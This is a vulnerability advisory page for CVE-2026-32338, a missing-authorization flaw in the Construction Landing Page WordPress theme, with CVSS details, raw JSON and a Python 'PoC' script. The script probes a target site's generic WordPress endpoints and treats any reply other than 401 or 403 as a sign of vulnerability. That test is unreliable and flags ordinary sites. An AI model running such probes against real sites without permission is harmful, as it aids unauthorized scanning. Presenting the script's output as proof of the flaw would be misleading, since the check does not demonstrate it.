Security Vulnerability Report
中文
CVE-2026-32338 CVSS 5.3 MEDIUM

CVE-2026-32338

Published: 2026-03-13 19:54:45
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Construction Landing Page construction-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Construction Landing Page: from n/a through <= 1.4.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Construction Landing Page <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32338 PoC - Construction Landing Page Missing Authorization # Target: WordPress site with Construction Landing Page theme <= 1.4.1 # Note: This is a generic PoC template; specific endpoints require further enumeration import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2026-32338 Missing Authorization in Construction Landing Page theme """ # Common WordPress theme endpoints that might lack authorization potential_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-admin/admin-post.php", "/wp-json/construction-landing-page/v1/", ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester/1.0', 'Content-Type': 'application/x-www-form-urlencoded', } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-32338 - Missing Authorization in Construction Landing Page") for endpoint in potential_endpoints: full_url = target_url.rstrip('/') + endpoint try: response = requests.get(full_url, headers=headers, timeout=10, verify=False) # If we get a response without 401/403, endpoint might be accessible if response.status_code not in [401, 403]: print(f"[+] Potential vulnerable endpoint found: {full_url}") print(f" Status: {response.status_code}") return True except requests.RequestException as e: print(f"[-] Error testing {full_url}: {e}") print("[*] Manual testing recommended - check theme options/settings pages") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32338-poc.py <target_url>") print("Example: python cve-2026-32338-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32338", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:44.687", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Construction Landing Page construction-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Construction Landing Page: from n/a through <= 1.4.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Construction Landing Page construction-landing-page permite Explotar Niveles de Seguridad de control de acceso Incorrectamente Configurados. Este problema afecta a Construction Landing Page: desde n/a hasta &lt;= 1.4.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/construction-landing-page/vulnerability/wordpress-construction-landing-page-theme-1-4-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}